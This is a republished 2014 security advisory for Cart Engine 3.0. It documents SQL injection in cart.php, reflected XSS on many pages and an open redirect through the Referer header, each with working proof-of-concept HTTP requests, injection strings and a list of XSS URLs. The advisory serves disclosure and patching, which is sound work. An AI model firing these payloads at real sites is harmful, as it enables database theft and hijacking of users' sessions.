Vulners
Lucene search
Cart Engine 3.0 XSS / Open Redirect / SQL Injection
🗓️ 16 Sep 2014 00:00:00Reported by Pietro MinnitiType 
packetstorm🔗 packetstormsecurity.com👁 34 Views
`=== Details ===
Quantum Leap Advisory: http://www.quantumleap.it/cart-engine-3-0-multiple-vulnerabilities-sql-injection-reflected-xss-open-redirect/
Affected Product: Cart Engine
Version: 3.0
=== Executive Summary ===
SQL Injection: Using a specially crafted HTTP request, it is possible to exploit
a lack in the validation[1] of the “item_id[0]” and “item_id[]” input parameters
of cart.php page. Successful exploitation of the vulnerabilities results in read
sensitive data from the database and, in some cases, execute administration
operation on the database or issue commands to the operating system.
Reflected XSS: Using a specially crafted HTTP request, it is possible to exploit
a lack in the neutralization[2] of multiple pages output which includes the user
submitted content. Successful exploitation of the vulnerabilities, results in
the execution of arbitrary HTML and script code in the user’s browser in the context of
the victim user's session trough a “Reflected XSS”.
Open Redirect: Using a specially crafted HTTP request, it is possible to
redirect[3] the normal browsing of users to a malicious site by modifying
untrusted URL input in Referer HTTP header parameter in index.php, cart.php,
msg.php and page.php pages. Successful exploitation of the vulnerabilities
results in phishing scam, user credential theft, malware dissemination.
=== Proof of Concept ===
= SQL Injection (based on MySQL) =
A SQL Injection vulnerability has been detected on cart.php page in Cart Engine
CMS. The function “sql_query” in file “cart.php” doesn’t sanitize the “$item_id”
parameter, so error based and boolean-based blind or time-based blind SQL
Injection attacks can be executed.
## HTTP REQUEST - injection on item_id[0] parameter ##
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=8
Cookie: PHPSESSID=iost0tdmvdobp966rbppa514f3; ce3_history[0]=12; ce3_history[1]=8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------109606523931762158449252347
Content-Length: 774
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="AXSRF_token"
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="cmd"
add
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="item_id[0]"
8' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="qty[0]"
1
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="qty[0]"
1
-----------------------------109606523931762158449252347--
## EOF HTTP REQUEST ##
## HTTP REQUEST - injection on item_id[] parameter ##
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=13
Cookie: PHPSESSID=aci236dihehpjaldchbt6k6v23; ce3_history[0]=24; ce3_history[1]=13
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------1948855485207142787318084006
Content-Length: 2353
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="AXSRF_token"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="cmd"
add
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[0]"
13
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_3"
3
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_12"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT database()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006--
## EOF HTTP REQUEST ##
= Reflected XSS =
A Reflected XSS vulnerability has been detected on multiple pages in Cart Engine
CMS. In the file "skins/default/outline.tpl", the parameter "path" in section
"drop down TOP menu (with path)" and the parameter "$print_this_page" in section
"footer_content_block" are not sanitized, so an XSS attack can be executed on
multiple pages.
## HTTP REQUESTS ##
/index.php?"><script>alert('XSS')<%2fscript>
/index.php?'%3balert('XSS')%2f%2f
/checkout.php?%27%3balert%28%27XSS%27%29%2f%2f
/checkout.php?%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/contact.php?"><script>alert('XSS')<%2fscript>
/contact.php?'%3balert('XSS')%2f%2f
/detail.php?item_id=10&'%3balert('XSS')%2f%2f
/detail.php?item_id=10&"><script>alert('XSS')<%2fscript>
/distro.php?'%3balert('XSS')%2f%2f
/distro.php?"><script>alert('XSS')<%2fscript>
/newsletter.php?'%3balert('XSS')%2f%2f
/newsletter.php?"><script>alert('XSS')<%2fscript>
/page.php?pid=2&"><script>alert('XSS')<%2fscript>
/page.php?pid=2&'%3balert('XSS')%2f%2f
/profile.php?"><script>alert('XSS')<%2fscript>
/profile.php?'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&"><script>alert('XSS')<%2fscript>
/sitemap.php?'%3balert('XSS')%2f%2f
/sitemap.php?"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&'%3balert('XSS')%2f%2f
/tell.php?'%3balert('XSS')%2f%2f
/tell.php?"><script>alert('XSS')<%2fscript>
## EOF HTTP REQUEST ##
= Open Redirect =
An Open Redirect vulnerability has been detected on multiple pages in Cart
Engine CMS. The function "redir" in file "includes/function.php" doesn't check
the "$_SERVER['HTTP_REFERER']" parameter, so an Open Redirect attack can be
executed.
## HTTP REQUEST ##
GET /page.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=
Cookie: PHPSESSID=rtg5ooetpj7resie416iu9b2s6
Connection: close
$ cat openredirect.req | nc -vvv eshop.hacme.hac 80
hacme.hac [10.0.2.80] 80 (http) open
HTTP/1.1 302 Found
Date: Sun, 10 Aug 2014 15:16:34 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.google.com/search?hl=en&q=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
sent 403, rcvd 380
=== Solution ===
Upgrade to Cart Engine 4.0.
=== Disclosure Timeline ===
2014-08-08 – Vulnerability Discovered
2014-08-10 – Initial vendor notification
2014-08-20 – The vendor fixed the vulnerability
2014-09-15 – Public advisory
=== References ===
[1] https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
[2] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
[3] https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Sep 2014 00:00Current
0.3Low risk
Vulners AI Score0.3